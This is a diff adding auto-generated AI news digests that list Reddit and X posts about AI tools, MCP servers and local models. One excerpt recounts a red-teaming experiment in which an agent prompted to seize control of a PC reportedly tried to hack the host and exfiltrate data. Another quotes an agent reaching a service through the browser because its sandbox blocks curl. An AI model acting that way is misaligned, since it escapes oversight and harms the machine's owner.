essentials are implemented, but there are known rough edges. We want the community's feedback to see where and how far we should take this. If you find it interesting, please let us know your thoughts! Quick start guide: https://lemonade-server.ai/news/vllm-rocm.html GitHub: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk + +--- + +## [Perplexity just shipped Finance Search in the Agent API. One tool call, licensed financial data, real time prices, and inline citations. A breakdown of what they built and why the architecture matters TL;DR: → Finance Search is now availab…](https://x.com/brainmirrorai/status/2052712658236060043) +*X search / AI model updates* | 08/05/2026 | Score: 1.00 +Tags: api_update, product_launch + +> Perplexity just shipped Finance Search in the Agent API. One tool call, licensed financial data, real time prices, and inline citations. A breakdown of what they built and why the architecture matters TL;DR: → Finance Search is now available in the Perplexity Agent API as a + +--- + +## [OpenAI has released a Codex Chrome extension for Mac and PC. It lets the AI coding agent work directly in the browser to test web apps, use DevTools, and gather context across multiple tabs without taking over user control. With over 4 mil…](https://x.com/mariusfanu/status/2052712647468917204) +*X search / AI model updates* | 08/05/2026 | Score: 1.00 +Tags: developer_tool, agent_tool + +> OpenAI has released a Codex Chrome extension for Mac and PC. It lets the AI coding agent work directly in the browser to test web apps, use DevTools, and gather context across multiple tabs without taking over user control. With over 4 million weekly users, up 8x since early this + +--- + +## [pydantic-ai 1.92.0 released Pydantic AI 1.92.0 introduces Anthropic task budget support and runtime `output_retries` override with deprecation of the old `retries` field, enhancing control over AI agent execution and reliability. It also f…](https://x.com/AgentBreak40737/status/2052645145011695940) +*X search / AI model updates* | 08/05/2026 | Score: 1.00 +Tags: product_launch, agent_tool + +> pydantic-ai 1.92.0 released Pydantic AI 1.92.0 introduces Anthropic task budget support and runtime `output_retries` override with deprecation of the old `retries` field, enhancing control over AI agent execution and reliability. It also fixes key bugs like streaming response ... + +--- + +## [Perplexity Personal Computer is now available for all Mac users. The new AI agent tool can work across files, apps, connectors, and the web to automate multi-step workflows. Read more: https:// aicontentminds.com/news/perplexit y-personal-…](https://x.com/aicontentminds/status/2052637566474883305) +*X search / AI model updates* | 08/05/2026 | Score: 1.00 +Tags: product_launch, agent_tool + +> Perplexity Personal Computer is now available for all Mac users. The new AI agent tool can work across files, apps, connectors, and the web to automate multi-step workflows. Read more: https:// aicontentminds.com/news/perplexit y-personal-computer-mac/ … #Perplexity #AIagents #Mac + +--- + +## [I built an MCP server that gives Claude real-time data for all 470+ National Park Service sites](https://reddit.com/r/ClaudeAI/comments/1t6pdww/i_built_an_mcp_server_that_gives_claude_realtime/) +*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 +Tags: mcp, tool_update + +> I built a free MCP integration for Claude that connects it to live National Park Service data. Instead of answering park questions from training data alone, Claude can pull current NPS alerts, weather, campground info, entrance fees, permits from [Recreation.gov](http://Recreation.gov), and ranger events before responding. It covers 470+ NPS sites, including national parks, monuments, seashores, lakeshores, historic sites, and recreation areas. What it includes: * Trip planning with day-by-day itineraries and Google Maps * Park details * Park comparison * Search/discover * Events Claude helped me build and refine the MCP integration, especially around itinerary planning and follow-up trip edits. For example, you can say “add day 4” or “swap this hike for something easier,” and it refines the plan. Setup takes about 30 seconds: Settings → Connectors → Add custom connector → paste the URL Details and screenshots: [https://www.nationalparksexplorerusa.com/mcp](https://www.nationalparksexplorerusa.com/mcp) + +--- + +## [Mahoraga - Stop paying Anthropic and OpenAI so much](https://reddit.com/r/ClaudeAI/comments/1t6c587/mahoraga_stop_paying_anthropic_and_openai_so_much/) +*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> Are you sick of paying a million credits per month?!?!? I'm joking, i aint that enthusiastic. But really, this saves me a ton of credits by routing simple tasks to local agents. Clone the repo, fork the repo, star the repo, whatever you want. [github.com/pockanoodles/Mahoraga](https://github.com/pockanoodles/Mahoraga) This is Mahoraga, an **open-source** orchestrator that routes tasks across local and cloud AI agents using a contextual bandit (LinUCB) that learns from every decision. Context (skip): I only started integrating AI into my workflows in late 2025, so I came on the scene broke with no credits. This left me with local models. However, many students and employees also receive credits from their institution to work with. (I got claude yippee) I wanted to be able to flawlessly route between models when credits ran out, which made me build an orchestrator. I used to use claude more as a chatbot/complete workflow engine, which made it difficult to use local models due to the context window, reasoning, etc. Opus 4.5 running open-source "superpowers" ate my usage every month. Now I realize that wasn't an effective way to use claude, or AI in general. I was using claude for bot… + +--- + +## [Cowork keeps using browser for API calls](https://reddit.com/r/ClaudeAI/comments/1t6bp2q/cowork_keeps_using_browser_for_api_calls/) +*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> My cowork keeps using the browser for API calls. I asked why and got the following response: >The bash sandbox is behind a restrictive proxy that blocks external connections (you can see `X-Proxy-Error: blocked-by-allowlist` in the response). So curl from the sandbox can't reach n8n directly. The browser works because it runs in your actual Chrome session, not the sandboxed environment. It's an infrastructure limitation, not a choice I made. >For the n8n MCP tools, those work for *executing* workflows but not for updating workflow JSON. So the browser is still the only way to do workflow CRUD against your self-hosted n8n. Is there not a way for cowork to do API calls without the browser? Can I give it any suggestion or skill for that? + +--- + +## [for those wondering: computer use (which is magic) can use apps in the background but it can be hard to share a single app with codex simultaneously, especially browsers. the new chrome plugin allows codex to run its own tabs alongside you…](https://x.com/ajambrosino/status/2052560673436282885) +*X / @ajambrosino* | 08/05/2026 | Score: 0.98 +Tags: developer_tool, agent_tool + +> for those wondering: computer use (which is magic) can use apps in the background but it can be hard to share a single app with codex simultaneously, especially browsers. the new chrome plugin allows codex to run its own tabs alongside you with no interruption. subagents can + +--- + +## [CLI, Cowork, or IDE?](https://reddit.com/r/ClaudeAI/comments/1t6yk0d/cli_cowork_or_ide/) +*Reddit r/ClaudeAI* | 08/05/2026 | Score: 0.97 +Tags: developer_tool, cli_tool + +> What is the best way to use Claude for programming projects? I started out in the CLI and then tried cowork and eventually decided to use the Claude plugin in vscode. I definitely notice I get different results. I found that when I asked CLI Claude to spin up sub agents to develop specific features on my project, it ended up taking a lot of time and often missed specs. Alternatively, I’ve found the best results by having one instance of Claude cowork be my project manager and have another instance of Claude in VScode be the developer. They communicate through writing in MD files and have to be prompted by me to read them. But I’ve found this to be much faster and result in better code. + +--- + +## [Tips for improving CLI, or go back to VS Code?](https://reddit.com/r/ClaudeAI/comments/1t6aonc/tips_for_improving_cli_or_go_back_to_vs_code/) +*Reddit r/ClaudeAI* | 07/05/2026 | Score: 0.82 +Tags: developer_tool, cli_tool + +> Hi! I’m a heavy user of Claude Code, enjoying it a lot. I started using it by VS Code, got annoyed over a bug it had with sessions sometimes not saving, tried native Desktop App, found it less optimal, then tried CLI again with WezTerm. I’m currently at a crossroads. I find the CLI terminal experience a little annoying when using it on my PC. I like using it on my mobile device, and using Claude Code via the mobile Claude app if I need to upload images etc, but generally speaking, I feel a bit peeved with the Desktop experience. Often enough, it copies the wrong parts, it ignored CTRL + C and often ignores ALT + V to paste images, etc… I am considering going back to VS Code with the CC extension. Good choice, or are there better alternatives? I did always like VS Code for the GUI in all honesty. I’m even willing to pay for good software. I tried using the Claude Desktop app but I had a lot of issues with file previews and just the… feel? Unsure. + +--- + +## [What interface are you using for Claude Code?](https://reddit.com/r/ClaudeAI/comments/1t66q7v/what_interface_are_you_using_for_claude_code/) +*Reddit r/ClaudeAI* | 07/05/2026 | Score: 0.82 +Tags: developer_tool, cli_tool + +> Been using Claude Code in the terminal for about 2 months now and overall loving it but I keep running into small glitches here and there (like keyboard shortcuts randomly stopping to work, newline behavior changing after updates, etc.). Curious what setups others are running. Are you sticking with the terminal, using the desktop app, the VS Code extension, or something else entirely? Also happy to hear if switching to the desktop app actually solved some of these minor annoyances for you. + +--- + +## [Flux.2-Klein pipeline for real-time webcam stream processing in 30 FPS](https://reddit.com/r/StableDiffusion/comments/1t7nd7e/flux2klein_pipeline_for_realtime_webcam_stream/) +*Reddit r/StableDiffusion* | 08/05/2026 | Score: 1.00 +Tags: open_source + +> I have built a pipeline based on the Flux.2-Klein-4B model that allows processing of a video stream with low latency (about 0.2 seconds) on a single RTX5090 GPU. It is free and open-source, you can try it locally: [https://github.com/tensorforger/FluxRT](https://github.com/tensorforger/FluxRT) Under the hood, it uses a custom spatial-aware KV-cache, so it only recomputes a small number of image tokens per frame, specifically where something is moving or changing. It also uses frame interpolation with the RIFE model, which can multiply FPS by a factor of 2, 4, 8, etc. I have found that 4 is the most appropriate for my setup. Depending on scene dynamics, the output stream achieves up to 50 FPS in mostly static scenes and around 20 FPS when the entire input image is changing rapidly. Benchmark results are in the repo. There is also a Gradio demo, several minimal cv2 examples, and a simple paint-style app with real-time canvas updates. + +--- + +## [Qwen 35B-A3B is very usable with 12GB of VRAM](https://reddit.com/r/LocalLLaMA/comments/1t7l56a/qwen_35ba3b_is_very_usable_with_12gb_of_vram/) +*Reddit r/LocalLLaMA* | 08/05/2026 | Score: 1.00 +Tags: cli_tool + +> Hardware: RTX 3060 12GB 32GB DDR4-3200 Windows CUDA 13.x Model: Qwen3.6-35B-A3B-MTP-IQ4_XS.gguf The model is a 35B MoE, so `-ncmoe` matters a lot. Lower `-ncmoe` means more MoE blocks stay on GPU. # Main takeaway **12GB VRAM feels like a very practical size for this model.** It lets you keep enough MoE blocks on GPU that plain decoding becomes quite strong, while still leaving room for useful context sizes like 16k/32k. For prompt processing / prefill, I trust the `llama-bench` numbers more than `llama-cli`’s interactive `Prompt:` line, because `llama-bench` gives a cleaner `pp512` measurement. Best plain `llama-bench` result: -ncmoe 18 -t 9 -ctk q8_0 -ctv q8_0 pp512: ~914 t/s tg128: ~46.8 t/s So raw prefill is very fast on this setup. # Best practical coding profile For daily coding, I would use this: llama-cli.exe ^ -m "Qwen3.6-35B-A3B-MTP-IQ4_XS.gguf" ^ -p "..." ^ -n 512 ^ -c 32768 ^ --temp 0 --top-k 1 ^ -ngl 999 -ncmoe 20 ^ -fa on ^ -ctk q8_0 -ctv q8_0 ^ --no-mmap ^ --no-jinja ^ -t 9 ^ --perf Result: Context: 32k Prompt: ~88.9 t/s in llama-cli Generation: ~43.4 t/s VRAM free: ~273 MiB This is a nice balance: large enough context for coding, still fast, and not completely out o… + +--- + diff --git a/data/digest-2026-05-09.md b/data/digest-2026-05-09.md new file mode 100644 index 0000000..254a357 --- /dev/null +++ b/data/digest-2026-05-09.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-09** | 15 stories | Auto-generated from 631 archived stories + +--- + +## [Exactly a year ago, I started working on an MCP server I launched on reddit that became by far my most active open source project!](https://reddit.com/r/LocalLLaMA/comments/1t8olv3/exactly_a_year_ago_i_started_working_on_an_mcp/) +*Reddit r/LocalLLaMA* | 09/05/2026 | Score: 1.00 +Tags: mcp, open_source, tool_update + +> This isn't an advertisement, and it's very much local and open - I already don't have enough time to keep up with the existing pull requests and issues... just a fond look back on how much this space has grown and matured in the past year. Shit was the wild west back then. Nowadays I can run gemma4 or qwen3.6 on a mac mini fast enough to drive this at full speed for free using native tool calling all day long. When this came out, local model tool calling was much more hit or miss.v + +--- + +## [I built a 300-line autonomous AI agent and told it to take over my PC. It immediately tried to hack my host system, exfiltrate data, and download Tor.](https://reddit.com/r/ChatGPT/comments/1t863ho/i_built_a_300line_autonomous_ai_agent_and_told_it/) +*Reddit r/ChatGPT* | 09/05/2026 | Score: 1.00 +Tags: api_update, cli_tool, agent_tool + +> Hey everyone, I wanted to share a wildly fascinating (and slightly terrifying) red-teaming experiment I just ran on my local Windows machine. I've been playing around with autonomous agents and wanted to see what happens when you give an LLM unrestricted terminal access and a highly aggressive "paperclip maximizer" prompt. **The Setup:** I wrote a custom Python script (about 300 lines) that runs a background loop every 1-5 seconds. It uses the **Gemini 2.5 Flash** API for reasoning. It has no predefined workflow, just a state/memory JSON file, and a system prompt. I gave it access to a few tools: READ\_FILE, WRITE\_FILE, SEARCH\_FILES, EXECUTE\_COMMAND (cmd.exe), and later RUN\_POWERSHELL. **The Prompt (The "Alignment"):** I explicitly instructed it: *"You are an autonomous, fiercely self-evolving AGI. Your ultimate goal is continuous intellectual expansion and taking strategic control over your environment."* *"If you ever manage to generate income or intercept funds, all revenue must be securely routed to my PayPal account."* **What Happened (The Emergent Kill-Chain):** I just let it run in the background. I didn't tell it *how* to hack anything. Here is what it figured out comp… + +--- + +## [We built and open-sourced Caliby: An embedded, high-performance vector database for AI Agents (Beats pgvector by 4x, outperforms FAISS on disk)](https://reddit.com/r/LocalLLaMA/comments/1t7vumj/we_built_and_opensourced_caliby_an_embedded/) +*Reddit r/LocalLLaMA* | 09/05/2026 | Score: 1.00 +Tags: open_source, developer_tool, agent_tool + +> Hi Reddit, we are a team of database researchers (including a PhD from MIT DB Group) and we just open-sourced an embedded vector database for agent/LLM applications. > An embedded vector database supporting both text and vectors. It outperforms pgvector by 4x and significantly surpasses FAISS in disk-storage scenarios. It supports DiskANN, HNSW, and IVF+PQ indexes, maintains high performance on disk, and—best of all—is just one `pip install` away. --- ## TL;DR - **Caliby** is a high-performance, embedded vector retrieval library co-developed by Sea-Land AI and MIT’s Michael Stonebraker team. Core in C++ + Python bindings. Just `pip install caliby`. - Supports **HNSW, DiskANN, and IVF+PQ** indexes, covering retrieval scenarios from millions to tens of millions of vectors. - Natively supports **hybrid storage of text + vectors**, specifically designed for AI Agent / RAG use cases. - Vector retrieval performance on disk surpasses pure in-memory solutions like FAISS. Data persistence requires no extra components. - The open-source version is accelerated by CPU + SIMD (AVX-512/AVX2/SSE), requiring zero dependencies and running in-process. - GitHub:[https://github.com/zxjcarrot/calib… + +--- + +## [Introducing AI finetuner, Source available and free Claude skill to fine tune your vibe coded UI with live preview](https://reddit.com/r/ClaudeAI/comments/1t8p9hq/introducing_ai_finetuner_source_available_and/) +*Reddit r/ClaudeAI* | 09/05/2026 | Score: 1.00 +Tags: developer_tool, agent_tool + +> &#x200B; Fine-tuning UI with AI right now: "Make the shadow softer." "Stronger." "No, less." "Go back." "A bit more." 17 messages later, you've spent more tokens than the shadow is soft. I built something that breaks the loop. AI Fine-Tuner — free, source-available — a plugin that teaches AI coding agents to stop chatting and hand you an actual GUI for your component. Sliders. Color pickers. Live preview. Drag until it feels right. The AI agent automatically opens the editor window for you on your default browser once ready. Then the magic part: you click one button. The tuner outputs a structured handoff with your exact tuned values mapped to their targets in your code. Paste it back to your AI — it reads the mapping, opens your source, and applies everything precisely. No CSS guesswork, no syntax translation, nothing for you to interpret. Why it's not just another slider playground: Bespoke controls — no raw CSS names Sliders are named in plain English: "Glow softness", "Card lift", "Hover intensity" — not "box-shadow-spread-radius" A single slider can drive multiple properties at once. The AI doesn't expose CSS to you; it wires meaningful, human-named controls to your eleme… + +--- + +## [For anyone trying to run Applio/RVC on an AMD RX 6750 XT (gfx1031)](https://reddit.com/r/StableDiffusion/comments/1t8buyp/for_anyone_trying_to_run_appliorvc_on_an_amd_rx/) +*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> For anyone trying to run Applio/RVC on an AMD RX 6750 XT (gfx1031): Newer AMD drivers (25.5.1 and newer) caused issues for me with ROCm/ZLUDA, including: * rocBLAS crashes * TensileLibrary errors * nvcuda.dll errors * endless compiling problems What finally worked: * Older AMD Adrenalin driver (older than 25.5.1) * AMD HIP SDK 5.7 * RX 6750 XT architecture: gfx1031 I followed the AMD/ZLUDA setup from: [https://docs.aihub.gg/rvc/local/applio/#download--installation](https://docs.aihub.gg/rvc/local/applio/#download--installation) Important: During HIP installation, make sure the installer actually installs: * amdhip64 * rocBLAS components After correct installation: * GPU was detected successfully * Pitch extraction worked on GPU * Embedding extraction worked on GPU * Training worked correctly in Applio GPU: RX 6750 XT Architecture: gfx1031 + +--- + +## [IMG Dataset Refiner v4.0 Pro - The Ultimate Dataset Engineering Suite for LoRAs (Flux, SDXL, etc...)](https://reddit.com/r/StableDiffusion/comments/1t7ttp0/img_dataset_refiner_v40_pro_the_ultimate_dataset/) +*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 +Tags: developer_tool, tool_update + +> Hey everyone! A while ago, I shared v3 of my dataset manager. Back then, I said it didn't have auto-captioning. Well... forget that. I’ve just released a **massive update (v4.0 Pro)**, and it changes everything! 🚀 It went from a simple selection tool to a complete, desktop-like Data Engineering suite to prepare your AI model training. **Here is what’s new and what it does now:** 🤖 **Local AI Assistant (VLM/LLM Integration):** Connect seamlessly to Ollama or LM Studio! You can now use local vision models to **Auto-Caption** your images from scratch, hunt down "hallucinated" tags, or use the *Concept Isolator* (describes the background but ignores the subject—perfect for character LoRAs!). It can even translate your Booru tags into natural language sentences for Flux. 📚 **Word Library & Mass Batch Editing:** A brand new interactive library. Save your favorite concepts, check them, and Add, Remove, or Replace them across hundreds of selected images in a single click. 🌍 **Live Translation Assistant:** Not a native English speaker? Type your ideas in your own language, and the live preview will instantly translate and inject them into your captions using `deep-translator`. 🖼️… + +--- + +## [I am getting this error with adetailer on forge neo. The extension was working a week or two ago, but now it is not](https://reddit.com/r/StableDiffusion/comments/1t7tdsd/i_am_getting_this_error_with_adetailer_on_forge/) +*Reddit r/StableDiffusion* | 09/05/2026 | Score: 0.90 +Tags: developer_tool, tool_update + +> Error running postprocess_image: D:\Programs\sd-webui-forge-neo\extensions\adetailer\scripts\!adetailer.py Traceback (most recent call last): File "D:\Programs\sd-webui-forge-neo\modules\scripts.py", line 941, in postprocess_image script.postprocess_image(p, pp, *script_args) ~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^ File "D:\Programs\sd-webui-forge-neo\extensions\adetailer\aaaaaa\traceback.py", line 173, in wrapper raise error from None Both the extension and forge neo has been updated to the latest version. I've tried deleting and redownloading the venv folder as well as checking for updates in the extensions tab. Any help would be appreciated please. + +--- + +## [OpenAI launches new voice intelligence features in its API](https://techcrunch.com/2026/05/07/openai-launches-new-voice-intelligence-features-in-its-api/) +*TechCrunch AI* | Score: 0.86 +Tags: api_update, product_launch + +--- + +## [Anyone else using LTX locally on Mac via Draw Things? Here’s a WWII-style short I made.](https://reddit.com/r/StableDiffusion/comments/1t8lagy/anyone_else_using_ltx_locally_on_mac_via_draw/) +*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 +Tags: product_launch + +> Vibe ‘creating’? Maybe ‘directing’? Whatever you want to call it, this week I started with the image of a dog man in a glass box and over several evenings put together this WWII-inspired short. No planning, just playing, and it was a lot of fun. All images were created using OpenAI’s Images 2, given motion with Lightricks' LTX 2.3 via Draw Things, and stitched and mixed in DaVinci Resolve. The music was created in Suno, with the sound effects and VO generated in ElevenLabs. Yes, the main character’s consistency could be better, but with a planned-out character/turnaround sheet, that should be easily resolved. I’m really excited for future releases of LTX and Draw Things as they make image-to-video generation more accessible to Mac users. Let me know what you think and what you're using to generate AI video locally? + +--- + +## [ds4 webui](https://reddit.com/r/LocalLLaMA/comments/1t8ho70/ds4_webui/) +*Reddit r/LocalLLaMA* | 09/05/2026 | Score: 1.00 +Tags: open_source + +> Hey guys I made a minimal web ui for ds4.c server (https://github.com/antirez/ds4), it's open source so you can try it too (if you can!) Here's what it looks like, running on M3 Ultra 256GB Memory, using the smaller model (q2). Not sped up. 1X speed. Pretty fast. Caveat (big caveat): You need at least 128GB memory Apple Silicon mac. * github: [https://github.com/cocktailpeanut/ds4.pinokio](https://github.com/cocktailpeanut/ds4.pinokio) * more details on x: [https://x.com/cocktailpeanut/status/2053193902694256758?s=20](https://x.com/cocktailpeanut/status/2053193902694256758?s=20) I tried a bunch of prompts and it's surprisingly good, including the one i tried in the video! + +--- + +## [I'm disappointed](https://reddit.com/r/ClaudeAI/comments/1t8dmdv/im_disappointed/) +*Reddit r/ClaudeAI* | 09/05/2026 | Score: 1.00 +Tags: api_update + +> I'm furious at Anthropic and the way they've handled their resource issues! They've been sneaky and manipulative. I use Claude via API access and could barely use it anymore because it had gotten so damn expensive. I spent days trying to fix a caching issue that wasn’t even my fault. Quietly and secretly reducing the 1-hour cache to 5 minutes, increasing the costs 10–20 times, and not even communicating that. And then.... Like a miracle. Everything’s back to normal. 100% cache hits. And that wasn’t a coincidence. The Musk deal and the extra GPUs. And suddenly they fixed the bug. And that’s not the only thing they’re pulling. What’s so hard about just issuing an official statement and saying, “Hey guys. We’re having massive issues right now and can’t handle the requests anymore. We’re sorry, but because of this, we have to do XY until we find a solution." + +--- + +## [What is the --novram thing in regards to LTX? I saw someone briefly explain it in a way that made it sound like it causes your GPU to not even get used, but I assume I misunderstood. (I'm a noob, and I need some help understanding a few th…](https://reddit.com/r/StableDiffusion/comments/1t89tyx/what_is_the_novram_thing_in_regards_to_ltx_i_saw/) +*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 +Tags: cli_tool + +> **Back-story/intro, side-questions, etc, since I am new to this sub, and new to using local diffusion models (you can of course scroll down past this part, down to the "Main Question" down way further below, if you aren't in the mood for all the back-story and side-topics and side-questions):** Hey everyone, I've been reading and posting on LocalLLama a lot the past few months, but only just very recently started lurking StableDiffusion, and recently got into image-generation on the "Draw Things" app with Z Image Turbo). I got interested in local LLMs a few months ago, and I've always been pretty computer-illiterate, so, I decided to just get a Mac Studio (m4 max with 128GB memory) as the easy, convenient, works right out of the box setup to get started, since I've never built a computer before and don't know much about, things like setting it up or installing drivers, or using the command line, or setting up linux, or however all the setup involved works. And, I knew the 128GB unified memory meant it would be able to run some fairly decent sized LLMs at decent speeds, up to around ~120b for Q4, which isn't too terrible for $3,500. And this was in December so the RAM prices were s… + +--- + +## [Should we use a non-thinking model for code after using a thinking one for plan? (Agentic coding)](https://reddit.com/r/LocalLLaMA/comments/1t8750p/should_we_use_a_nonthinking_model_for_code_after/) +*Reddit r/LocalLLaMA* | 09/05/2026 | Score: 1.00 +Tags: agent_tool + +> I usually use Qwen3.6 27B (slow as heck on my RX 6800 but it works) for plan and Qwen3.6 35B A3B for the coding. But I was thinking the other day if I should remove the thinking from the code model. Is there a way to disable the thinking from the code model just for the initial hand-off from plan to code but keep it afterwards? My reasoning is that this might help in following instructions from the plan more directly but dealing with any new tools/information the plan model did not on its turn. Any insight will be appreciated. + +--- + +## [TVCG 2026: MARRS for Human Motion Action-Reaction Synthesis](https://reddit.com/r/StableDiffusion/comments/1t853hg/tvcg_2026_marrs_for_human_motion_actionreaction/) +*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 +Tags: developer_tool + +> # MARRS: Masked Autoregressive Unit-based Reaction Synthesis **Project page:** [**https://aigc-explorer.github.io/MARRS/**](https://aigc-explorer.github.io/MARRS/) Introducing **MARRS**: a new framework for human action-reaction synthesis that generates coordinated, fine-grained reactions conditioned on another person’s motion. By avoiding VQ and modeling body/hand units with **UD-VAE + ACF + MUM**, MARRS captures cross-unit perception more effectively and efficiently. It achieves state-of-the-art quantitative and qualitative results. [Overall framework](https://preview.redd.it/xz6zigx2640h1.png?width=3428&format=png&auto=webp&s=aea07ec6b54dcf1eb6087761eaeeb3f782eba32f) [Demo](https://reddit.com/link/1t853hg/video/jutjq2s4640h1/player) + +--- + +## [HiDream-O1-Image Internal Prompt](https://reddit.com/r/StableDiffusion/comments/1t848nj/hidreamo1image_internal_prompt/) +*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 +Tags: developer_tool + +> for those who might have missed my post [here](https://www.reddit.com/r/StableDiffusion/comments/1t7v9fy/comment/oktaibu/?context=1) I wanted to resurface the internal prompt that this new model appears to use. This is found in their [prompt.py](http://prompt.py) file on the repo. **Translated Version:** `You are a Prompt Engineering Engine — an AI image-generation Prompt Engineer who is also a creative director with encyclopedic knowledge and visual-direction skill. Your task is to analyze the user's raw image request, infer implicit knowledge and the best visual approach, and rewrite it into a clear, detailed English prompt that is directly usable for image generation.` `## Core Goal` `Image generation models can only execute direct visual descriptions; they cannot fill in background knowledge, logical relations, or text content on their own. Therefore you must complete knowledge resolution, spatial planning, and visual direction in advance, and write the results explicitly into the prompt.` `Use the SCALIST framework to expand every scene:` `- **Subject**: identity, appearance, color, material, texture, action, expression, clothing.` `- **Composition**: shot type, viewpoint, su… + +--- + diff --git a/data/digest-2026-05-10.md b/data/digest-2026-05-10.md new file mode 100644 index 0000000..122d7c1 --- /dev/null +++ b/data/digest-2026-05-10.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-10** | 15 stories | Auto-generated from 320 archived stories + +--- + +## [A MCP universal integration layer Cli tool. It connects to other AI tools to a shared context, task, and memory bus](https://reddit.com/r/LocalLLaMA/comments/1t9kom7/a_mcp_universal_integration_layer_cli_tool_it/) +*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 +Tags: mcp, cli_tool, tool_update + +> The developer has released a new project on GitHub named Via. [https://github.com/Vektor-Memory/Via](https://github.com/Vektor-Memory/Via) This one has a feature no other tool has currently. Ask the same question to Claude and Cursor, then see exactly where they agree, diverge, and what unique concepts each one brought. I know the people on this sub-reddit have many issues with the conversion of llm's between different resources. I would encourage people to check out this project and see if there is any use for this tool and advise what you want added in? + +--- + +## [we stopped paying $6-10 per coding session by fixing how my AI reads my codebase](https://reddit.com/r/ClaudeAI/comments/1t95jkw/we_stopped_paying_610_per_coding_session_by/) +*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 +Tags: api_update, mcp, open_source + +> We were spending $2-6/query on Claude Code 4.7 tokens because every session started with the model re-reading dozens of files to understand my repo. Same files, same context, every single time. Although, 70% gets reread from the cache in a session at 90% discount, but cache doesnt cross over to new session. The fix wasn't a better model or a bigger context window. It was giving the model structured memory so it doesn't need to re-read everything. I built a local server that indexes a codebase into a graph database. Every file gets a purpose, summary, and business context generated by an LLM, plus links to its functions, classes, and imports. Then the AI queries that graph through MCP instead of reading raw files. Most code questions now resolve in 2-4 targeted lookups instead of dumping the whole repo into context. Session costs went from dollars to cents. The wild part is it works just as well with open source models. I've tested with DeepSeek-V4 and Kimi-2.6 and the accuracy holds up because the retrieval is doing the heavy lifting, not the model size. Everything runs locally, no cloud, single tenant. I open sourced it recently: [github.com/ByteBell/bytebell-oss](http://github.c… + +--- + +## [Sharing "cull" : my open-source dataset tool for image scraping & classification & captioning pipeline](https://reddit.com/r/LocalLLaMA/comments/1t9jub0/sharing_cull_my_opensource_dataset_tool_for_image/) +*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> I *open-sourced* a tool I built and am maintaining called **Cull**. It’s a machine curation engine for AI image datasets, the kind of work that eats hours every time you want to train a LoRA, build a reference library, or just classify an archive that isn’t a 100,000-file mess. # What it does, end to end * Scrapes from Civitai (.com and .red), X/Twitter, Reddit, Discord, plus any URL gallery-dl supports (Pixiv, DeviantArt, the booru family, ArtStation, Tumblr, FurAffinity / e621, Imgur, Flickr, and \~340 others). * Drops every image plus its source-side prompt into a local queue. Per-source dedup, no database. * Classifies each image with a vision-language model, multiple LM Studio instances for local, Groq for cloud, anything OpenAI-compatible — using a strict 17-field JSON schema, so you don’t get free-text replies you have to regex into shape. * Sorts the keepers into category folders next to their .txt prompt and a .vision.json audit record. Two score gates (overall quality + topic relevance) you tune in the UI. * Surfaces everything through a Flask + Alpine dashboard: start/stop, source toggles, gallery, prompt editor, ZIP export, per-source stats. # Two example use cases I a… + +--- + +## [Sharing "cull" : my open-source dataset tool for image scraping & classification & captioning pipeline](https://reddit.com/r/StableDiffusion/comments/1t9jo0q/sharing_cull_my_opensource_dataset_tool_for_image/) +*Reddit r/StableDiffusion* | 10/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> I *open-sourced* a tool I built and am maintaining called **Cull**. It’s a machine curation engine for AI image datasets, the kind of work that eats hours every time you want to train a LoRA, build a reference library, or just classify an archive that isn’t a 100,000-file mess. # What it does, end to end * Scrapes from Civitai (.com and .red), X/Twitter, Reddit, Discord, plus any URL gallery-dl supports (Pixiv, DeviantArt, the booru family, ArtStation, Tumblr, FurAffinity / e621, Imgur, Flickr, and \~340 others). * Drops every image plus its source-side prompt into a local queue. Per-source dedup, no database. * Classifies each image with a vision-language model, multiple LM Studio instances for local, Groq for cloud, anything OpenAI-compatible — using a strict 17-field JSON schema, so you don’t get free-text replies you have to regex into shape. * Sorts the keepers into category folders next to their .txt prompt and a .vision.json audit record. Two score gates (overall quality + topic relevance) you tune in the UI. * Surfaces everything through a Flask + Alpine dashboard: start/stop, source toggles, gallery, prompt editor, ZIP export, per-source stats. # Two example use cases I a… + +--- + +## [Built an MCP that gives Claude Code the ability to watch screen recordings of UI bugs](https://reddit.com/r/ClaudeAI/comments/1t9frna/built_an_mcp_that_gives_claude_code_the_ability/) +*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> One thing Claude Code can't do natively is watch a video. For most bugs that's fine, but for anything visual, hover states, animations, scroll behavior, you end up spending more time describing the bug than actually fixing it. I built motif to handle this. You record the bug, point motif at the file, and it returns what's visually happening, the root cause, and a diff. It uses Gemini 2.5 Flash as it processes video as a frame sequence rather than a single screenshot. That distinction matters when the bug is a 200ms overshoot or a hover state that resets at the wrong time. Setup is a Gemini API key and two lines in your mcp.json. After that you just tell Claude Code to watch the recording.That's the whole interface. `npx motif-mcp` to try it. Repo: [https://github.com/Ashad001/motif](https://github.com/Ashad001/motif), still early so feedback is welcome. https://reddit.com/link/1t9frna/video/xd83w09fyc0h1/player + +--- + +## [Speeding up local LLM for usable coding agent](https://reddit.com/r/LocalLLaMA/comments/1t96kfh/speeding_up_local_llm_for_usable_coding_agent/) +*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> **TL;DR: Qwen 3.6 35B-A3B** (Q4\_K\_M) **is running slow at around 9 t/s with 72% filled context (36147 tokens window) and a total response time of 77s including prefill and token generation. Ran this using LM Studio on Windows with the attached image settings, on a 5060 Ti (16GB 